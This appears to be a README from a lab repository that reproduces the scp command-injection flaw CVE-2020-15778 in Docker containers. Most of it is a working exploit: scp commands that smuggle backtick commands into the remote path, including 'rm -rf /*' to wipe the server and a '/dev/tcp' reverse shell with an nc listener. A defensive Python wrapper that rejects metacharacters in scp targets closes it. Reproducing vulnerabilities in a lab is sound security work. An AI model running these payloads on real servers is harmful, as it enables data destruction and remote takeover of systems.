# CVE-2020-15778
## Introduction
This repo reproduces [CVE-2020-15778](https://nvd.nist.gov/vuln/detail/CVE-2020-15778).
## Steps
1. Build the Docker images for the scp server and client.
```bash
cd client
docker build -t client-cve .
```
```bash
cd server
docker build -t server-cve .
```
2. Spin up the scp server in container.
```bash
docker run -d -P --name scp-server server-cve
```
Retrieve the internal IP address of the scp server with:
```bash
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
```
3. Run the client in container.
```bash
docker run --name scp-client -i -t client-cve
```
4. Inject your own shell command into the scp server by calling scp from the client.
In the client terminal, run
```bash
scp nil.txt root@<internal IP of scp server>:'`your command`/tmp'
```
The password is "PASSWORD".
## Examples
Here are some examples of this exploit.
1. Delete everything on the server to crash it.
```bash
scp nil.txt root@<internal IP of scp server>:'`rm -rf /*`/tmp'
```
2. Reflect the server's bash into the client (mimicking ssh).
Listen on a port on the client machine.
```bash
nc -lvvp 8080
```
Use scp to make the server connect an interactive bash back to the client machine.
```bash
scp nil.txt root@<internal IP of scp server>:'`bash -i >& /dev/tcp/<internal IP of scp client>/8080 0>& 1`/tmp'
```
```
The client IP address can be retrieved with:
```bash
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
```
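For the defender's side, here is an added example that is not part of this repo: a small Python wrapper that refuses to hand scp a remote target whose path contains shell metacharacters such as the backticks used above, so a tool that takes destination strings from an untrusted source cannot be turned into a command injection against the server. It assumes OpenSSH scp's `user@host:path` target form and plain hostnames or IPv4 addresses (no IPv6 brackets); it is a client-side guard only and does not replace fixing the server.

```python
import re
import subprocess

# Metacharacters the remote login shell expands when scp hands it the destination
# path; CVE-2020-15778 abuses backticks, so the whole class is rejected here.
SHELL_META = re.compile(r'[`$;&|<>(){}\\\'"\n]')
# Shape of a remote scp target: optional user, a host or IPv4 address, a path.
# (Assumption: IPv6 bracket syntax is not needed and is therefore refused.)
TARGET_RE = re.compile(
    r'^(?:(?P<user>[a-z_][a-z0-9_-]*)@)?(?P<host>[A-Za-z0-9][A-Za-z0-9.-]*):(?P<path>.+)$'
)

def parse_target(target):
    """Split 'user@host:path' into its parts; raise ValueError on unexpected shapes."""
    m = TARGET_RE.match(target)
    if not m:
        raise ValueError(f"unrecognised scp target: {target!r}")
    return m.group("user"), m.group("host"), m.group("path")

def is_safe_remote_path(path):
    """True only if nothing in the path would be expanded by the remote shell."""
    return SHELL_META.search(path) is None

def reject_reason(target):
    """None if the target is acceptable, otherwise a short reason string."""
    try:
        _user, _host, path = parse_target(target)
    except ValueError as exc:
        return str(exc)
    if not is_safe_remote_path(path):
        return f"remote path contains shell metacharacters: {path!r}"
    return None

def build_scp_argv(local_file, target):
    """argv for scp (run without shell=True, so the local side does no expansion either)."""
    reason = reject_reason(target)
    if reason:
        raise ValueError(reason)
    return ["scp", local_file, target]

def safe_scp(local_file, target):
    """Run scp only after the target has passed the checks above."""
    return subprocess.run(build_scp_argv(local_file, target), check=True)

if __name__ == "__main__":
    # Constructed examples: the first is accepted, the second has the injection
    # shape shown in this README and is refused before scp is ever executed.
    for t in ("root@10.0.0.5:/tmp/nil.txt", "root@10.0.0.5:`id`/tmp"):
        print(t, "->", reject_reason(t) or "ok")
```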